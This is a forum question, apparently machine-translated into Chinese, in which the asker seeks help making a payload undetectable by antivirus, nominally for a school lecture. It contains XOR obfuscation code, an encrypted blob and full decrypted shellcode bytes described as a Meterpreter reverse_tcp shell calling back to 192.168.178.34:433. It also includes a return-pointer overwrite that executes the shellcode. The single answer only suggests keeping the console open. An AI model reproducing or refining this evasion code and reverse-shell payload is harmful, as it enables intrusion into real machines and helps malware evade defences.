我试图让我的有效载荷无法检测到AV(没有坏的想法,只是为了学校的讲座)。
在运行操作码之前,我使用以下代码解密加密版本的代码:
string encryptDecrypt(string toEncrypt) {
char key[1] = {'K'}; //Any chars will work
string output = toEncrypt;
for (int i = 0; i < toEncrypt.size(); i++)
output[i] = toEncrypt[i] ^ key[i % (sizeof(key) / sizeof(char))];
return output;
}
然后我将字符串转换为带符号的无符号字符:
string decrypted = encryptDecrypt(code);
cout << "Decrypted:" << decrypted << "\n";
unsigned char *val=new unsigned char[decrypted.length()+1];
strcpy((char *)val,decrypted.c_str());
运行操作码的代码(不是我自己的代码):
int *ret; // a simple integer pointer pointing a address
ret = (int *)&ret + 2; // change the address pointed by
(*ret) = (int)val; // change the return pointer to the shellcode .. so we'll be jumping to our shellcode right away
我的加密操作码是:
"3)/3*.3}(3z3~{3/r3(~3/r3|3y3-3~-3xx3(r3)z3~3xz3}-3zx3{x3}-3zx3sx3(|3**3s.3.z3*(3~*3((3{*3/3r*3)z3sx3*s3*)3-z3-{3)r3r)3(z3|x3.-3z|3*r3/}3{3*(3/-3-.3y)3{~3~~3/r3{y3r}3(}3zr3{3z3z~3.3.}3y~3/}3sx3.|3}y3{)3}r3)~3x)3|3/(3y*3s3z/3//3(z3{y3)x3}~3x~3/y3)y33.s3}r3./3}3{*3).3s~3(.3z3*x3*{3rr3*-3z|3~.3zs3}}3}}3r-3)|3|3|3~y3(r3s{3}-3s/3)(3-s3s(3x{3(|3x.3.-3..3y3*~3~|3}3-3{z3}}3*r3}x3(z3}3{}3.|3s/3}s3rr3y3*}3r3zy3()3}r3z/3}{3.s3*/3}3xy3rz3-3yy3r~3*.3.|3s/3*3{)3}x3yx3r.3y}3y.3y)3~x3{)3/z3*)3-)3z(3*y3rr3*3)}3y(3rz3y/3zz3**3/}3{|3.~3y3yr3*s3z}3}(3./3-(3}3{}3(3|(3{/3/}3.r3*s3)s3/x3|/3rx3r~3}.3~-3|)3.3s.3r.3({3}z3}s3-{3}}3yy3y~3){3/}3sy3r~3~s3x/3{/3(r3|s3x.3(|3}y3zy3/z3).3/)3s*3s3r)3r{3y)3r3xz3//3})3z.3){3yz3y~3/|3)z3xz3~z3s}3xr3(*3*z3yx3x*3*{3*~3.~3}/3~(3*|3/{3~*3(x3~s3x|3/r3{3*}3(}3.s3|-3r{3~(3~~3.s3/(3){3~~3.s3s*3/*3~~3s{3}*3)-3{~3)~3|~3}*3x*3}}3.x3r~3})3/*3*3-/3rz3{~3sy3*z3}*3}{3rz3*}3r~3-}3)|3{.3-.3{s3-|3*.3-.3}y3-|3-.3r}3|r3/s3-z3~}3sz3-x3~r3--3{s3r~3ys3r.3{/3)(3./3x.3{/3xy3x}3~}3s{3)~3(r3~|3}y3s*3z-3}.3z{3()3*x3/~3y)3}}3sz3|(3*}3ss3r~3|-3.x"
我的解密操作码是(应该是meterpreter reverse_tcp ip:192.168.178.34和port:433):
"\\xbd\\xae\\x6c\\x14\\x50\\xd9\\xc5\\xd9\\x74\\x24\\xf4\\x5f\\x33\\xc9\\xb1\\x54\\x31\\x6f\\x13\\x03\\x6f\\x13\\x83\\xc7\\xaa\\x8e\\xe1\\xac\\x5a\\xcc\\x0a\\x4d\\x9a\\xb1\\x83\\xa8\\xab\\xf1\\xf0\\xb9\\x9b\\xc1\\x73\\xef\\x17\\xa9\\xd6\\x04\\xac\\xdf\\xfe\\x2b\\x05\\x55\\xd9\\x02\\x96\\xc6\\x19\\x04\\x14\\x15\\x4e\\xe6\\x25\\xd6\\x83\\xe7\\x62\\x0b\\x69\\xb5\\x3b\\x47\\xdc\\x2a\\x48\\x1d\\xdd\\xc1\\x02\\xb3\\x65\\x35\\xd2\\xb2\\x44\\xe8\\x69\\xed\\x46\\x0a\\xbe\\x85\\xce\\x14\\xa3\\xa0\\x99\\xaf\\x17\\x5e\\x18\\x66\\x66\\x9f\\xb7\\x47\\x47\\x52\\xc9\\x80\\x6f\\x8d\\xbc\\xf8\\x8c\\x30\\xc7\\x3e\\xef\\xee\\x42\\xa5\\x57\\x64\\xf4\\x01\\x66\\xa9\\x63\\xc1\\x64\\x06\\xe7\\x8d\\x68\\x99\\x24\\xa6\\x94\\x12\\xcb\\x69\\x1d\\x60\\xe8\\xad\\x46\\x32\\x91\\xf4\\x22\\x95\\xae\\xe7\\x8d\\x4a\\x0b\\x63\\x23\\x9e\\x26\\x2e\\x2b\\x53\\x0b\\xd1\\xab\\xfb\\x1c\\xa2\\x99\\xa4\\xb6\\x2c\\x91\\x2d\\x11\\xaa\\xd6\\x07\\xe5\\x24\\x29\\xa8\\x16\\x6c\\xed\\xfc\\x46\\x06\\xc4\\x7c\\x0d\\xd6\\xe9\\xa8\\xb8\\xd3\\x7d\\x93\\x95\\x6e\\x5f\\x7b\\xe4\\x8e\\x9e\\xc0\\x61\\x68\\xf0\\x66\\x22\\x25\\xb0\\xd6\\x82\\x95\\x58\\x3d\\x0d\\xc9\\x78\\x3e\\xc7\\x62\\x12\\xd1\\xbe\\xdb\\x8a\\x48\\x9b\\x90\\x2b\\x94\\x31\\xdd\\x6b\\x1e\\xb0\\x21\\x25\\xd7\\xb1\\x31\\x51\\x86\\x39\\xca\\xa1\\x23\\x3a\\xa0\\xa5\\xe5\\x6d\\x5c\\xa7\\xd0\\x5a\\xc3\\x58\\x37\\xd9\\x04\\xa6\\xc6\\xe8\\x7f\\x90\\x5c\\x55\\xe8\\xdc\\xb0\\x55\\xe8\\x8a\\xda\\x55\\x80\\x6a\\xbf\\x05\\xb5\\x75\\x6a\\x3a\\x66\\xe3\\x95\\x6b\\xda\\xa4\\xfd\\x91\\x05\\x82\\xa1\\x6a\\x60\\x91\\xa6\\x95\\xf6\\xb7\\x0e\\xfe\\x08\\xf7\\xae\\xfe\\x62\\xf7\\xfe\\x96\\x79\\xd8\\xf1\\x56\\x81\\xf3\\x59\\xff\\x08\\x95\\x28\\x9e\\x0d\\xbc\\xed\\x3e\\x0d\\x32\\x36\\x56\\x80\\xb5\\xc9\\x57\\x62\\x8a\\x1f\\x6e\\x10\\xcb\\xa3\\xd5\\x2b\\x66\\x81\\x7c\\xa6\\x88\\x95\\x7f\\xe3"
当我编译并执行它时,它打开一个cmd打印出解密的shellcode,并在几毫秒后关闭
请帮忙 谢谢@ all:D
答案 0 :(得分:0)
当我编译并执行它时,它打开一个cmd打印出来 解密的shellcode,并在几毫秒后关闭
如果这是您的问题,那么请转到Debug - &gt;启动时不进行调试或硬编码会强制cmd等待&#34;等待&#34;。
您可以在代码末尾使用其中一个:
system("pause");
char x;
然后x = getchar();